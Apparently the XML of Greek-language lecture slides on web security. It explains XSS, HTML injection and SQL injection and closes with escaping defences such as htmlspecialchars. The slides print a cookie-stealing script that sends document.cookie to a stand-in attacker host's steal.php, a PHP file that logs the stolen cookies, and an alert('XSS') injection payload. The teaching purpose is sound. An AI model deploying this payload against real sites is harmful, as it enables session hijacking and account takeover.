            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Χρήσιμο επίσης για να </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>θέσουμε </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>cookies </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>χωρίς να είναι απαραίτητη η </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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4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Αρκεί λίγη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l-GR" dirty="0" smtClean="0"/>
              <a:t>για να κάνει το κακό...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Έστω ότι ο </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>kakoslykos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t> καταφέρνει να τρέξει το ακόλουθο στο </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>kokkinoskoufitsa.gr:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="el-GR" dirty="0"/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&lt;script type=“text/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javascript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”&gt;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img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document.createElement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‘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img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’ );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img.src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= ‘http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://kakoslykos.gr/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steal.php?cookie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=‘ +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document.cookie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document.appendChild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img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);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67681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Ενώ στο </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>steal.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>του </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>kakoslykos.gr </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>έχει:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="el-GR" dirty="0"/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&lt;?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php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file_put_contents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	“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haha.txt”, $_GET[ ‘cookie’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);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?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&gt;</a:t>
            </a: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0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Τρόπος επίθεσης:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Ο </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>kakoslykos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l-GR" dirty="0" smtClean="0"/>
              <a:t>«</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>εισάγει</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>» τον κώδικα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l-GR" dirty="0" smtClean="0"/>
              <a:t>στο </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>kokkinoskoyfitsa.gr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>και περιμένει</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Ο διαχειριστής του </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>kokkinoskoyfitsa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l-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>επισκέπτεται</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t> τη σελίδα </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>kokkinoskoyfitsa.gr</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Ο «κακός» κώδικας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l-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>τρέχει</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t> στον υπολογιστή του «καλού» διαχειριστή χωρίς να το γνωρίζει</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Τα </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>cookies </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>του «καλού» διαχειριστή </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>στέλνονται</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t> μέσω</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>στη σελίδα </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>kakoslykos.gr</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Εκεί </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>καταγράφονται</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t> σε αρχείο, και ο </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>kakoslykos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>έχει πλέον πρόσβαση διαχειριστή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7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Υπό κανονικές συνθήκες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userid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users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password = ‘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ILoveYou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AND name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dionyziz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LIMIT 1;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14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Πώς εισάγεται όμως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l-GR" dirty="0" smtClean="0"/>
              <a:t>κώδικας;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Σημεία όπου εκτυπώνεται είσοδος χρήστη χωρίς έλεγχο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&lt;p&gt;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&lt;?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php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echo “Welcome, “ . $_GET[ ‘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user’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?&gt;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&lt;/p&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" sz="2000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Υπό κανονικές συνθήκες...</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>αν </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>είναι </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>dionyziz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="el-GR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&lt;p&gt;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Welcome,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dionyziz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p&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" sz="2000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6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Τι γίνεται όμως αν...</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>είναι </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>diony</a:t>
            </a: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ziz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="el-GR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&lt;p&gt;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Welcome, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>diony</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/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  <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ziz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p&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" sz="2000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877882" y="2996958"/>
            <a:ext cx="380124" cy="47415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58008" y="3471109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Συντακτικό σφάλμα!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57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l-GR" dirty="0" smtClean="0"/>
              <a:t>ν</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>είναι </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>diony</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;strong&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ziz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/strong&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="el-GR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&lt;p&gt;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Welcome, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>diony</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;strong&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ziz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/strong&gt;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p&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" sz="2000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932040" y="2933311"/>
            <a:ext cx="380124" cy="47415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58008" y="3471109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Δεν </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>υπάρχει συντακτικό σφάλμα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62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Ουσιαστικά κάναμε ένα </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Παρόμοια με το </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SQL injection, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>έχουμε πλήρη έλεγχο του κώδικα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3068960"/>
            <a:ext cx="8229600" cy="3560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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>ν</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>είναι </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>diony</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script type=“text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”&gt;alert( ‘XSS’ );&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ziz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="el-GR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&lt;p&gt;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Welcome, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>diony</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script type=“text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”&gt;alert( ‘XSS’ );&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ziz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&lt;/p&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" sz="2000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6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Αλλάζοντας τα περιεχόμενα του </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>έχουμε πλέον απόλυτο έλεγχο στο τι θα εκτελεστεί σε ένα </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>που δεν είναι δικό μας...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3068960"/>
            <a:ext cx="8229600" cy="3560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&lt;p&gt;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Welcome, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>diony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>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>script type=“text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”&gt;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var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img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document.createElement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‘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img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’ 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img.src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= ‘http://kakoslykos.gr/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steal.php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’ +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document.cookie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document.appendChild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img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ziz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&lt;/p&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" sz="2000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66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3700"/>
            <a:ext cx="8229600" cy="990600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XSS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2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Αποφυγή </a:t>
            </a:r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455" y="1412776"/>
            <a:ext cx="8229600" cy="504056"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Πρέπει να φιλτράρουμε τα </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>inputs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>μας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0416" y="1844824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Αποφυγή όλων των χαρακτήρων </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;, &amp;, “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t> και </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="el-GR" dirty="0" smtClean="0"/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&lt;?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php</a:t>
            </a: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	$username = $_GET[ ‘username’ ];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if (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  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strpos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 $username, “&lt;”  ) !== false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||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strpos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 $username, “&gt;” ) !== false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 ||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strpos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 $username, ‘”’  ) !== false ) {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	die( “You’re not welcome here.” );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}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?&gt;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68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Αποφυγή </a:t>
            </a:r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455" y="1412776"/>
            <a:ext cx="8229600" cy="5184576"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Αν όμως θέλουμε να επιτρέπουμε </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;, &gt;, &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>και </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Σε ένα </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>forum </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>π.χ. κάποιος μπορεί να θέλει </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" i="1" dirty="0" smtClean="0"/>
              <a:t>όντως</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t> να γράψει </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>που να εμφανίζεται αυτούσια</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="el-GR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Κάνουμε </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>escape </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>τους χαρακτήρες μας</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>με </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>entities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dirty="0" smtClean="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>    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sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>&amp;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sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>lt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sym typeface="Wingdings" pitchFamily="2" charset="2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sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>         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sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>&amp;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sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>gt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sym typeface="Wingdings" pitchFamily="2" charset="2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sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>         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sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>&amp;amp;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“ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>    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sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>&amp;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sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>quot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sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR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17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Αποφυγή </a:t>
            </a:r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htmlspecialchars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0"/>
              <a:t>Αντικαθιστά τα </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>entities</a:t>
            </a:r>
          </a:p>
          <a:p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&lt;?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php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$username = $_GET[ ‘username’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echo “Welcome, “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	.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htmlspecialchars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 $username );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?&gt;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33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 smtClean="0"/>
              <a:t>Τι γίνεται όμως αν...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$username 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είναι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dio’nyziz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;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userid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users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name =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dio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’nyziz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AND password =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ILoveYou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LIMIT 1;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638601" y="4335205"/>
            <a:ext cx="449429" cy="39139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67946" y="3961126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Συντακτικό σφάλμα!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09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556792"/>
            <a:ext cx="8229600" cy="50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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>ν</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>είναι </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>diony</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script type=“text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”&gt;alert( ‘XSS’ );&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ziz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="el-GR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&lt;p&gt;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Welcome, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>diony&amp;lt;script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type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>quot;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>javascript&amp;quot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
